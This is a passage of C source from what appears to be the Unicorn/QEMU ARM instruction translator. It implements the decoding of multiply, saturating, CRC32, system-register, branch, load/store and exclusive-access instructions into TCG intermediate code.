tcg_gen_ext16u_i32(tcg_ctx, tmp, tmp); tcg_gen_ori_i32(tcg_ctx, tmp, tmp, a->imm << 16); store_reg(s, a->rd, tmp); return true; } /* * Multiply and multiply accumulate */ static bool op_mla(DisasContext *s, arg_s_rrrr *a, bool add) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1, t2; t1 = load_reg(s, a->rn); t2 = load_reg(s, a->rm); tcg_gen_mul_i32(tcg_ctx, t1, t1, t2); tcg_temp_free_i32(tcg_ctx, t2); if (add) { t2 = load_reg(s, a->ra); tcg_gen_add_i32(tcg_ctx, t1, t1, t2); tcg_temp_free_i32(tcg_ctx, t2); } if (a->s) { gen_logic_CC(tcg_ctx, t1); } store_reg(s, a->rd, t1); return true; } static bool trans_MUL(DisasContext *s, arg_MUL *a) { return op_mla(s, a, false); } static bool trans_MLA(DisasContext *s, arg_MLA *a) { return op_mla(s, a, true); } static bool trans_MLS(DisasContext *s, arg_MLS *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1, t2; if (!ENABLE_ARCH_6T2) { return false; } t1 = load_reg(s, a->rn); t2 = load_reg(s, a->rm); tcg_gen_mul_i32(tcg_ctx, t1, t1, t2); tcg_temp_free_i32(tcg_ctx, t2); t2 = load_reg(s, a->ra); tcg_gen_sub_i32(tcg_ctx, t1, t2, t1); tcg_temp_free_i32(tcg_ctx, t2); store_reg(s, a->rd, t1); return true; } static bool op_mlal(DisasContext *s, arg_s_rrrr *a, bool uns, bool add) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t0, t1, t2, t3; t0 = load_reg(s, a->rm); t1 = load_reg(s, a->rn); if (uns) { tcg_gen_mulu2_i32(tcg_ctx, t0, t1, t0, t1); } else { tcg_gen_muls2_i32(tcg_ctx, t0, t1, t0, t1); } if (add) { t2 = load_reg(s, a->ra); t3 = load_reg(s, a->rd); tcg_gen_add2_i32(tcg_ctx, t0, t1, t0, t1, t2, t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } if (a->s) { gen_logicq_cc(tcg_ctx, t0, t1); } store_reg(s, a->ra, t0); store_reg(s, a->rd, t1); return true; } static bool trans_UMULL(DisasContext *s, arg_UMULL *a) { return op_mlal(s, a, true, false); } static bool trans_SMULL(DisasContext *s, arg_SMULL *a) { return op_mlal(s, a, false, false); } static bool trans_UMLAL(DisasContext *s, arg_UMLAL *a) { return op_mlal(s, a, true, true); } static bool trans_SMLAL(DisasContext *s, arg_SMLAL *a) { return op_mlal(s, a, false, true); } static bool trans_UMAAL(DisasContext *s, arg_UMAAL *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t0, t1, t2, zero; if (s->thumb ? 
!arm_dc_feature(s, ARM_FEATURE_THUMB_DSP) : !ENABLE_ARCH_6) { return false; } t0 = load_reg(s, a->rm); t1 = load_reg(s, a->rn); tcg_gen_mulu2_i32(tcg_ctx, t0, t1, t0, t1); zero = tcg_const_i32(tcg_ctx, 0); t2 = load_reg(s, a->ra); tcg_gen_add2_i32(tcg_ctx, t0, t1, t0, t1, t2, zero); tcg_temp_free_i32(tcg_ctx, t2); t2 = load_reg(s, a->rd); tcg_gen_add2_i32(tcg_ctx, t0, t1, t0, t1, t2, zero); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, zero); store_reg(s, a->ra, t0); store_reg(s, a->rd, t1); return true; } /* * Saturating addition and subtraction */ static bool op_qaddsub(DisasContext *s, arg_rrr *a, bool add, bool doub) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t0, t1; if (s->thumb ? !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP) : !ENABLE_ARCH_5TE) { return false; } t0 = load_reg(s, a->rm); t1 = load_reg(s, a->rn); if (doub) { gen_helper_add_saturate(tcg_ctx, t1, tcg_ctx->cpu_env, t1, t1); } if (add) { gen_helper_add_saturate(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); } else { gen_helper_sub_saturate(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); } tcg_temp_free_i32(tcg_ctx, t1); store_reg(s, a->rd, t0); return true; } #define DO_QADDSUB(NAME, ADD, DOUB) \ static bool trans_##NAME(DisasContext *s, arg_rrr *a) \ { \ return op_qaddsub(s, a, ADD, DOUB); \ } DO_QADDSUB(QADD, true, false) DO_QADDSUB(QSUB, false, false) DO_QADDSUB(QDADD, true, true) DO_QADDSUB(QDSUB, false, true) #undef DO_QADDSUB /* * Halfword multiply and multiply accumulate */ static bool op_smlaxxx(DisasContext *s, arg_rrrr *a, int add_long, bool nt, bool mt) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t0, t1, tl, th; if (s->thumb ? !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP) : !ENABLE_ARCH_5TE) { return false; } t0 = load_reg(s, a->rn); t1 = load_reg(s, a->rm); gen_mulxy(tcg_ctx, t0, t1, nt, mt); tcg_temp_free_i32(tcg_ctx, t1); switch (add_long) { case 0: store_reg(s, a->rd, t0); break; case 1: t1 = load_reg(s, a->ra); gen_helper_add_setq(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); tcg_temp_free_i32(tcg_ctx, t1); store_reg(s, a->rd, t0); break; case 2: tl = load_reg(s, a->ra); th = load_reg(s, a->rd); /* Sign-extend the 32-bit product to 64 bits. */ t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_sari_i32(tcg_ctx, t1, t0, 31); tcg_gen_add2_i32(tcg_ctx, tl, th, tl, th, t0, t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); store_reg(s, a->ra, tl); store_reg(s, a->rd, th); break; default: g_assert_not_reached(); break; } return true; } #define DO_SMLAX(NAME, add, nt, mt) \ static bool trans_##NAME(DisasContext *s, arg_rrrr *a) \ { \ return op_smlaxxx(s, a, add, nt, mt); \ } DO_SMLAX(SMULBB, 0, 0, 0) DO_SMLAX(SMULBT, 0, 0, 1) DO_SMLAX(SMULTB, 0, 1, 0) DO_SMLAX(SMULTT, 0, 1, 1) DO_SMLAX(SMLABB, 1, 0, 0) DO_SMLAX(SMLABT, 1, 0, 1) DO_SMLAX(SMLATB, 1, 1, 0) DO_SMLAX(SMLATT, 1, 1, 1) DO_SMLAX(SMLALBB, 2, 0, 0) DO_SMLAX(SMLALBT, 2, 0, 1) DO_SMLAX(SMLALTB, 2, 1, 0) DO_SMLAX(SMLALTT, 2, 1, 1) #undef DO_SMLAX static bool op_smlawx(DisasContext *s, arg_rrrr *a, bool add, bool mt) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t0, t1; if (!ENABLE_ARCH_5TE) { return false; } t0 = load_reg(s, a->rn); t1 = load_reg(s, a->rm); /* * Since the nominal result is product<47:16>, shift the 16-bit * input up by 16 bits, so that the result is at product<63:32>. 
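 *
 * Concretely: rn * rm<15:0> is a 48-bit product whose architected
 * result is bits <47:16>.  Multiplying by (rm<15:0> << 16) instead
 * scales the product by 2^16, so those same bits land at <63:32>,
 * which is exactly the high half of the 64-bit muls2 result below.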
*/ if (mt) { tcg_gen_andi_i32(tcg_ctx, t1, t1, 0xffff0000); } else { tcg_gen_shli_i32(tcg_ctx, t1, t1, 16); } tcg_gen_muls2_i32(tcg_ctx, t0, t1, t0, t1); tcg_temp_free_i32(tcg_ctx, t0); if (add) { t0 = load_reg(s, a->ra); gen_helper_add_setq(tcg_ctx, t1, tcg_ctx->cpu_env, t1, t0); tcg_temp_free_i32(tcg_ctx, t0); } store_reg(s, a->rd, t1); return true; } #define DO_SMLAWX(NAME, add, mt) \ static bool trans_##NAME(DisasContext *s, arg_rrrr *a) \ { \ return op_smlawx(s, a, add, mt); \ } DO_SMLAWX(SMULWB, 0, 0) DO_SMLAWX(SMULWT, 0, 1) DO_SMLAWX(SMLAWB, 1, 0) DO_SMLAWX(SMLAWT, 1, 1) #undef DO_SMLAWX /* * MSR (immediate) and hints */ static bool trans_YIELD(DisasContext *s, arg_YIELD *a) { /* * When running single-threaded TCG code, use the helper to ensure that * the next round-robin scheduled vCPU gets a crack. When running in * MTTCG we don't generate jumps to the helper as it won't affect the * scheduling of other vCPUs. */ if (!(tb_cflags(s->base.tb) & CF_PARALLEL)) { gen_set_pc_im(s, s->base.pc_next); s->base.is_jmp = DISAS_YIELD; } return true; } static bool trans_WFE(DisasContext *s, arg_WFE *a) { /* * When running single-threaded TCG code, use the helper to ensure that * the next round-robin scheduled vCPU gets a crack. In MTTCG mode we * just skip this instruction. Currently the SEV/SEVL instructions, * which are *one* of many ways to wake the CPU from WFE, are not * implemented so we can't sleep like WFI does. */ if (!(tb_cflags(s->base.tb) & CF_PARALLEL)) { gen_set_pc_im(s, s->base.pc_next); s->base.is_jmp = DISAS_WFE; } return true; } static bool trans_WFI(DisasContext *s, arg_WFI *a) { /* For WFI, halt the vCPU until an IRQ. */ gen_set_pc_im(s, s->base.pc_next); s->base.is_jmp = DISAS_WFI; return true; } static bool trans_NOP(DisasContext *s, arg_NOP *a) { return true; } static bool trans_MSR_imm(DisasContext *s, arg_MSR_imm *a) { uint32_t val = ror32(a->imm, a->rot * 2); uint32_t mask = msr_mask(s, a->mask, a->r); if (gen_set_psr_im(s, mask, a->r, val)) { unallocated_encoding(s); } return true; } /* * Cyclic Redundancy Check */ static bool op_crc32(DisasContext *s, arg_rrr *a, bool c, MemOp sz) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1, t2, t3; if (!dc_isar_feature(aa32_crc32, s)) { return false; } t1 = load_reg(s, a->rn); t2 = load_reg(s, a->rm); switch (sz) { case MO_8: gen_uxtb(t2); break; case MO_16: gen_uxth(t2); break; case MO_32: break; default: g_assert_not_reached(); break; } t3 = tcg_const_i32(tcg_ctx, 1 << sz); if (c) { gen_helper_crc32c(tcg_ctx, t1, t1, t2, t3); } else { gen_helper_crc32(tcg_ctx, t1, t1, t2, t3); } tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); store_reg(s, a->rd, t1); return true; } #define DO_CRC32(NAME, c, sz) \ static bool trans_##NAME(DisasContext *s, arg_rrr *a) \ { return op_crc32(s, a, c, sz); } DO_CRC32(CRC32B, false, MO_8) DO_CRC32(CRC32H, false, MO_16) DO_CRC32(CRC32W, false, MO_32) DO_CRC32(CRC32CB, true, MO_8) DO_CRC32(CRC32CH, true, MO_16) DO_CRC32(CRC32CW, true, MO_32) #undef DO_CRC32 /* * Miscellaneous instructions */ static bool trans_MRS_bank(DisasContext *s, arg_MRS_bank *a) { if (arm_dc_feature(s, ARM_FEATURE_M)) { return false; } gen_mrs_banked(s, a->r, a->sysm, a->rd); return true; } static bool trans_MSR_bank(DisasContext *s, arg_MSR_bank *a) { if (arm_dc_feature(s, ARM_FEATURE_M)) { return false; } gen_msr_banked(s, a->r, a->sysm, a->rn); return true; } static bool trans_MRS_reg(DisasContext *s, arg_MRS_reg *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (arm_dc_feature(s, ARM_FEATURE_M)) 
{ return false; } if (a->r) { if (IS_USER(s)) { unallocated_encoding(s); return true; } tmp = load_cpu_field(tcg_ctx, spsr); } else { tmp = tcg_temp_new_i32(tcg_ctx); gen_helper_cpsr_read(tcg_ctx, tmp, tcg_ctx->cpu_env); } store_reg(s, a->rd, tmp); return true; } static bool trans_MSR_reg(DisasContext *s, arg_MSR_reg *a) { TCGv_i32 tmp; uint32_t mask = msr_mask(s, a->mask, a->r); if (arm_dc_feature(s, ARM_FEATURE_M)) { return false; } tmp = load_reg(s, a->rn); if (gen_set_psr(s, mask, a->r, tmp)) { unallocated_encoding(s); } return true; } static bool trans_MRS_v7m(DisasContext *s, arg_MRS_v7m *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!arm_dc_feature(s, ARM_FEATURE_M)) { return false; } tmp = tcg_const_i32(tcg_ctx, a->sysm); gen_helper_v7m_mrs(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); store_reg(s, a->rd, tmp); return true; } static bool trans_MSR_v7m(DisasContext *s, arg_MSR_v7m *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr, reg; if (!arm_dc_feature(s, ARM_FEATURE_M)) { return false; } addr = tcg_const_i32(tcg_ctx, (a->mask << 10) | a->sysm); reg = load_reg(s, a->rn); gen_helper_v7m_msr(tcg_ctx, tcg_ctx->cpu_env, addr, reg); tcg_temp_free_i32(tcg_ctx, addr); tcg_temp_free_i32(tcg_ctx, reg); /* If we wrote to CONTROL, the EL might have changed */ gen_helper_rebuild_hflags_m32_newel(tcg_ctx, tcg_ctx->cpu_env); gen_lookup_tb(s); return true; } static bool trans_BX(DisasContext *s, arg_BX *a) { if (!ENABLE_ARCH_4T) { return false; } gen_bx_excret(s, load_reg(s, a->rm)); return true; } static bool trans_BXJ(DisasContext *s, arg_BXJ *a) { if (!ENABLE_ARCH_5J || arm_dc_feature(s, ARM_FEATURE_M)) { return false; } /* Trivial implementation equivalent to bx. */ gen_bx(s, load_reg(s, a->rm)); return true; } static bool trans_BLX_r(DisasContext *s, arg_BLX_r *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!ENABLE_ARCH_5) { return false; } tmp = load_reg(s, a->rm); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[14], s->base.pc_next | s->thumb); gen_bx(s, tmp); return true; } /* * BXNS/BLXNS: only exist for v8M with the security extensions, * and always UNDEF if NonSecure. We don't implement these in * the user-only mode either (in theory you can use them from * Secure User mode but they are too tied in to system emulation). 
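 * When they are legal, gen_bxns()/gen_blxns() emit calls to helpers
 * that perform the v8M security-state transition checks at run time.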
*/ static bool trans_BXNS(DisasContext *s, arg_BXNS *a) { if (!s->v8m_secure || IS_USER_ONLY) { unallocated_encoding(s); } else { gen_bxns(s, a->rm); } return true; } static bool trans_BLXNS(DisasContext *s, arg_BLXNS *a) { if (!s->v8m_secure || IS_USER_ONLY) { unallocated_encoding(s); } else { gen_blxns(s, a->rm); } return true; } static bool trans_CLZ(DisasContext *s, arg_CLZ *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!ENABLE_ARCH_5) { return false; } tmp = load_reg(s, a->rm); tcg_gen_clzi_i32(tcg_ctx, tmp, tmp, 32); store_reg(s, a->rd, tmp); return true; } static bool trans_ERET(DisasContext *s, arg_ERET *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!arm_dc_feature(s, ARM_FEATURE_V7VE)) { return false; } if (IS_USER(s)) { unallocated_encoding(s); return true; } if (s->current_el == 2) { /* ERET from Hyp uses ELR_Hyp, not LR */ tmp = load_cpu_field(tcg_ctx, elr_el[2]); } else { tmp = load_reg(s, 14); } gen_exception_return(s, tmp); return true; } static bool trans_HLT(DisasContext *s, arg_HLT *a) { gen_hlt(s, a->imm); return true; } static bool trans_BKPT(DisasContext *s, arg_BKPT *a) { if (!ENABLE_ARCH_5) { return false; } if (arm_dc_feature(s, ARM_FEATURE_M) && false && // semihosting_enabled() && !IS_USER(s) && (a->imm == 0xab)) { gen_exception_internal_insn(s, s->pc_curr, EXCP_SEMIHOST); } else { gen_exception_bkpt_insn(s, syn_aa32_bkpt(a->imm, false)); } return true; } static bool trans_HVC(DisasContext *s, arg_HVC *a) { if (!ENABLE_ARCH_7 || arm_dc_feature(s, ARM_FEATURE_M)) { return false; } if (IS_USER(s)) { unallocated_encoding(s); } else { gen_hvc(s, a->imm); } return true; } static bool trans_SMC(DisasContext *s, arg_SMC *a) { if (!ENABLE_ARCH_6K || arm_dc_feature(s, ARM_FEATURE_M)) { return false; } if (IS_USER(s)) { unallocated_encoding(s); } else { gen_smc(s); } return true; } static bool trans_SG(DisasContext *s, arg_SG *a) { if (!arm_dc_feature(s, ARM_FEATURE_M) || !arm_dc_feature(s, ARM_FEATURE_V8)) { return false; } /* * SG (v8M only) * The bulk of the behaviour for this instruction is implemented * in v7m_handle_execute_nsc(), which deals with the insn when * it is executed by a CPU in non-secure state from memory * which is Secure & NonSecure-Callable. * Here we only need to handle the remaining cases: * * in NS memory (including the "security extension not * implemented" case) : NOP * * in S memory but CPU already secure (clear IT bits) * We know that the attribute for the memory this insn is * in must match the current CPU state, because otherwise * get_phys_addr_pmsav8 would have generated an exception. */ if (s->v8m_secure) { /* Like the IT insn, we don't need to generate any code */ s->condexec_cond = 0; s->condexec_mask = 0; } return true; } static bool trans_TT(DisasContext *s, arg_TT *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr, tmp; if (!arm_dc_feature(s, ARM_FEATURE_M) || !arm_dc_feature(s, ARM_FEATURE_V8)) { return false; } if (a->rd == 13 || a->rd == 15 || a->rn == 15) { /* We UNDEF for these UNPREDICTABLE cases */ unallocated_encoding(s); return true; } if (a->A && !s->v8m_secure) { /* This case is UNDEFINED. 
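 * (The TTA/TTAT forms query the alternate security state, which is
 * only accessible when the CPU is in Secure state.)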
*/ unallocated_encoding(s); return true; } addr = load_reg(s, a->rn); tmp = tcg_const_i32(tcg_ctx, (a->A << 1) | a->T); gen_helper_v7m_tt(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, tmp); tcg_temp_free_i32(tcg_ctx, addr); store_reg(s, a->rd, tmp); return true; } /* * Load/store register index */ static ISSInfo make_issinfo(DisasContext *s, int rd, bool p, bool w) { ISSInfo ret; /* ISS not valid if writeback */ if (p && !w) { ret = rd; if (s->base.pc_next - s->pc_curr == 2) { ret |= ISSIs16Bit; } } else { ret = ISSInvalid; } return ret; } static TCGv_i32 op_addr_rr_pre(DisasContext *s, arg_ldst_rr *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr = load_reg(s, a->rn); if (s->v8m_stackcheck && a->rn == 13 && a->w) { gen_helper_v8m_stackcheck(tcg_ctx, tcg_ctx->cpu_env, addr); } if (a->p) { TCGv_i32 ofs = load_reg(s, a->rm); gen_arm_shift_im(tcg_ctx, ofs, a->shtype, a->shimm, 0); if (a->u) { tcg_gen_add_i32(tcg_ctx, addr, addr, ofs); } else { tcg_gen_sub_i32(tcg_ctx, addr, addr, ofs); } tcg_temp_free_i32(tcg_ctx, ofs); } return addr; } static void op_addr_rr_post(DisasContext *s, arg_ldst_rr *a, TCGv_i32 addr, int address_offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!a->p) { TCGv_i32 ofs = load_reg(s, a->rm); gen_arm_shift_im(tcg_ctx, ofs, a->shtype, a->shimm, 0); if (a->u) { tcg_gen_add_i32(tcg_ctx, addr, addr, ofs); } else { tcg_gen_sub_i32(tcg_ctx, addr, addr, ofs); } tcg_temp_free_i32(tcg_ctx, ofs); } else if (!a->w) { tcg_temp_free_i32(tcg_ctx, addr); return; } tcg_gen_addi_i32(tcg_ctx, addr, addr, address_offset); store_reg(s, a->rn, addr); } static bool op_load_rr(DisasContext *s, arg_ldst_rr *a, MemOp mop, int mem_idx) { TCGContext *tcg_ctx = s->uc->tcg_ctx; ISSInfo issinfo = make_issinfo(s, a->rt, a->p, a->w); TCGv_i32 addr, tmp; addr = op_addr_rr_pre(s, a); tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld_i32(s, tmp, addr, mem_idx, mop | s->be_data); disas_set_da_iss(s, mop, issinfo); /* * Perform base writeback before the loaded value to * ensure correct behavior with overlapping index registers. */ op_addr_rr_post(s, a, addr, 0); store_reg_from_load(s, a->rt, tmp); return true; } static bool op_store_rr(DisasContext *s, arg_ldst_rr *a, MemOp mop, int mem_idx) { TCGContext *tcg_ctx = s->uc->tcg_ctx; ISSInfo issinfo = make_issinfo(s, a->rt, a->p, a->w) | ISSIsWrite; TCGv_i32 addr, tmp; addr = op_addr_rr_pre(s, a); tmp = load_reg(s, a->rt); gen_aa32_st_i32(s, tmp, addr, mem_idx, mop | s->be_data); disas_set_da_iss(s, mop, issinfo); tcg_temp_free_i32(tcg_ctx, tmp); op_addr_rr_post(s, a, addr, 0); return true; } static bool trans_LDRD_rr(DisasContext *s, arg_ldst_rr *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mem_idx = get_mem_index(s); TCGv_i32 addr, tmp; if (!ENABLE_ARCH_5TE) { return false; } if (a->rt & 1) { unallocated_encoding(s); return true; } addr = op_addr_rr_pre(s, a); tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld_i32(s, tmp, addr, mem_idx, MO_UL | s->be_data); store_reg(s, a->rt, tmp); tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld_i32(s, tmp, addr, mem_idx, MO_UL | s->be_data); store_reg(s, a->rt + 1, tmp); /* LDRD w/ base writeback is undefined if the registers overlap. 
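 * (e.g. "ldrd r0, r1, [r0], #8" is such a case.)  The -4 below undoes
 * the +4 used to address the second word, so any writeback that does
 * happen sees the correct base-relative address.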
*/ op_addr_rr_post(s, a, addr, -4); return true; } static bool trans_STRD_rr(DisasContext *s, arg_ldst_rr *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mem_idx = get_mem_index(s); TCGv_i32 addr, tmp; if (!ENABLE_ARCH_5TE) { return false; } if (a->rt & 1) { unallocated_encoding(s); return true; } addr = op_addr_rr_pre(s, a); tmp = load_reg(s, a->rt); gen_aa32_st_i32(s, tmp, addr, mem_idx, MO_UL | s->be_data); tcg_temp_free_i32(tcg_ctx, tmp); tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); tmp = load_reg(s, a->rt + 1); gen_aa32_st_i32(s, tmp, addr, mem_idx, MO_UL | s->be_data); tcg_temp_free_i32(tcg_ctx, tmp); op_addr_rr_post(s, a, addr, -4); return true; } /* * Load/store immediate index */ static TCGv_i32 op_addr_ri_pre(DisasContext *s, arg_ldst_ri *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int ofs = a->imm; if (!a->u) { ofs = -ofs; } if (s->v8m_stackcheck && a->rn == 13 && a->w) { /* * Stackcheck. Here we know 'addr' is the current SP; * U is set if we're moving SP up, else down. It is * UNKNOWN whether the limit check triggers when SP starts * below the limit and ends up above it; we chose to do so. */ if (!a->u) { TCGv_i32 newsp = tcg_temp_new_i32(tcg_ctx); tcg_gen_addi_i32(tcg_ctx, newsp, tcg_ctx->cpu_R[13], ofs); gen_helper_v8m_stackcheck(tcg_ctx, tcg_ctx->cpu_env, newsp); tcg_temp_free_i32(tcg_ctx, newsp); } else { gen_helper_v8m_stackcheck(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->cpu_R[13]); } } return add_reg_for_lit(s, a->rn, a->p ? ofs : 0); } static void op_addr_ri_post(DisasContext *s, arg_ldst_ri *a, TCGv_i32 addr, int address_offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!a->p) { if (a->u) { address_offset += a->imm; } else { address_offset -= a->imm; } } else if (!a->w) { tcg_temp_free_i32(tcg_ctx, addr); return; } tcg_gen_addi_i32(tcg_ctx, addr, addr, address_offset); store_reg(s, a->rn, addr); } static bool op_load_ri(DisasContext *s, arg_ldst_ri *a, MemOp mop, int mem_idx) { TCGContext *tcg_ctx = s->uc->tcg_ctx; ISSInfo issinfo = make_issinfo(s, a->rt, a->p, a->w); TCGv_i32 addr, tmp; addr = op_addr_ri_pre(s, a); tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld_i32(s, tmp, addr, mem_idx, mop | s->be_data); disas_set_da_iss(s, mop, issinfo); /* * Perform base writeback before the loaded value to * ensure correct behavior with overlapping index registers. */ op_addr_ri_post(s, a, addr, 0); store_reg_from_load(s, a->rt, tmp); return true; } static bool op_store_ri(DisasContext *s, arg_ldst_ri *a, MemOp mop, int mem_idx) { TCGContext *tcg_ctx = s->uc->tcg_ctx; ISSInfo issinfo = make_issinfo(s, a->rt, a->p, a->w) | ISSIsWrite; TCGv_i32 addr, tmp; addr = op_addr_ri_pre(s, a); tmp = load_reg(s, a->rt); gen_aa32_st_i32(s, tmp, addr, mem_idx, mop | s->be_data); disas_set_da_iss(s, mop, issinfo); tcg_temp_free_i32(tcg_ctx, tmp); op_addr_ri_post(s, a, addr, 0); return true; } static bool op_ldrd_ri(DisasContext *s, arg_ldst_ri *a, int rt2) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mem_idx = get_mem_index(s); TCGv_i32 addr, tmp; addr = op_addr_ri_pre(s, a); tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld_i32(s, tmp, addr, mem_idx, MO_UL | s->be_data); store_reg(s, a->rt, tmp); tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld_i32(s, tmp, addr, mem_idx, MO_UL | s->be_data); store_reg(s, rt2, tmp); /* LDRD w/ base writeback is undefined if the registers overlap. 
*/ op_addr_ri_post(s, a, addr, -4); return true; } static bool trans_LDRD_ri_a32(DisasContext *s, arg_ldst_ri *a) { if (!ENABLE_ARCH_5TE || (a->rt & 1)) { return false; } return op_ldrd_ri(s, a, a->rt + 1); } static bool trans_LDRD_ri_t32(DisasContext *s, arg_ldst_ri2 *a) { arg_ldst_ri b = { .u = a->u, .w = a->w, .p = a->p, .rn = a->rn, .rt = a->rt, .imm = a->imm }; return op_ldrd_ri(s, &b, a->rt2); } static bool op_strd_ri(DisasContext *s, arg_ldst_ri *a, int rt2) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mem_idx = get_mem_index(s); TCGv_i32 addr, tmp; addr = op_addr_ri_pre(s, a); tmp = load_reg(s, a->rt); gen_aa32_st_i32(s, tmp, addr, mem_idx, MO_UL | s->be_data); tcg_temp_free_i32(tcg_ctx, tmp); tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); tmp = load_reg(s, rt2); gen_aa32_st_i32(s, tmp, addr, mem_idx, MO_UL | s->be_data); tcg_temp_free_i32(tcg_ctx, tmp); op_addr_ri_post(s, a, addr, -4); return true; } static bool trans_STRD_ri_a32(DisasContext *s, arg_ldst_ri *a) { if (!ENABLE_ARCH_5TE || (a->rt & 1)) { return false; } return op_strd_ri(s, a, a->rt + 1); } static bool trans_STRD_ri_t32(DisasContext *s, arg_ldst_ri2 *a) { arg_ldst_ri b = { .u = a->u, .w = a->w, .p = a->p, .rn = a->rn, .rt = a->rt, .imm = a->imm }; return op_strd_ri(s, &b, a->rt2); } #define DO_LDST(NAME, WHICH, MEMOP) \ static bool trans_##NAME##_ri(DisasContext *s, arg_ldst_ri *a) \ { \ return op_##WHICH##_ri(s, a, MEMOP, get_mem_index(s)); \ } \ static bool trans_##NAME##T_ri(DisasContext *s, arg_ldst_ri *a) \ { \ return op_##WHICH##_ri(s, a, MEMOP, get_a32_user_mem_index(s)); \ } \ static bool trans_##NAME##_rr(DisasContext *s, arg_ldst_rr *a) \ { \ return op_##WHICH##_rr(s, a, MEMOP, get_mem_index(s)); \ } \ static bool trans_##NAME##T_rr(DisasContext *s, arg_ldst_rr *a) \ { \ return op_##WHICH##_rr(s, a, MEMOP, get_a32_user_mem_index(s)); \ } DO_LDST(LDR, load, MO_UL) DO_LDST(LDRB, load, MO_UB) DO_LDST(LDRH, load, MO_UW) DO_LDST(LDRSB, load, MO_SB) DO_LDST(LDRSH, load, MO_SW) DO_LDST(STR, store, MO_UL) DO_LDST(STRB, store, MO_UB) DO_LDST(STRH, store, MO_UW) #undef DO_LDST /* * Synchronization primitives */ static bool op_swp(DisasContext *s, arg_SWP *a, MemOp opc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr, tmp; TCGv taddr; opc |= s->be_data; addr = load_reg(s, a->rn); taddr = gen_aa32_addr(s, addr, opc); tcg_temp_free_i32(tcg_ctx, addr); tmp = load_reg(s, a->rt2); tcg_gen_atomic_xchg_i32(tcg_ctx, tmp, taddr, tmp, get_mem_index(s), opc); tcg_temp_free(tcg_ctx, taddr); store_reg(s, a->rt, tmp); return true; } static bool trans_SWP(DisasContext *s, arg_SWP *a) { return op_swp(s, a, MO_UL | MO_ALIGN); } static bool trans_SWPB(DisasContext *s, arg_SWP *a) { return op_swp(s, a, MO_UB); } /* * Load/Store Exclusive and Load-Acquire/Store-Release */ static bool op_strex(DisasContext *s, arg_STREX *a, MemOp mop, bool rel) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr; /* Some cases stopped being UNPREDICTABLE in v8A (but not v8M) */ bool v8a = ENABLE_ARCH_8 && !arm_dc_feature(s, ARM_FEATURE_M); /* We UNDEF for these UNPREDICTABLE cases. 
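 * (e.g. "strex r1, r0, [r1]", where the status register rd aliases
 * the base register rn.)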
*/ if (a->rd == 15 || a->rn == 15 || a->rt == 15 || a->rd == a->rn || a->rd == a->rt || (!v8a && s->thumb && (a->rd == 13 || a->rt == 13)) || (mop == MO_64 && (a->rt2 == 15 || a->rd == a->rt2 || (!v8a && s->thumb && a->rt2 == 13)))) { unallocated_encoding(s); return true; } if (rel) { tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); } addr = tcg_temp_local_new_i32(tcg_ctx); load_reg_var(s, addr, a->rn); tcg_gen_addi_i32(tcg_ctx, addr, addr, a->imm); gen_store_exclusive(s, a->rd, a->rt, a->rt2, addr, mop); tcg_temp_free_i32(tcg_ctx, addr); return true; } static bool trans_STREX(DisasContext *s, arg_STREX *a) { if (!ENABLE_ARCH_6) { return false; } return op_strex(s, a, MO_32, false); } static bool trans_STREXD_a32(DisasContext *s, arg_STREX *a) { if (!ENABLE_ARCH_6K) { return false; } /* We UNDEF for these 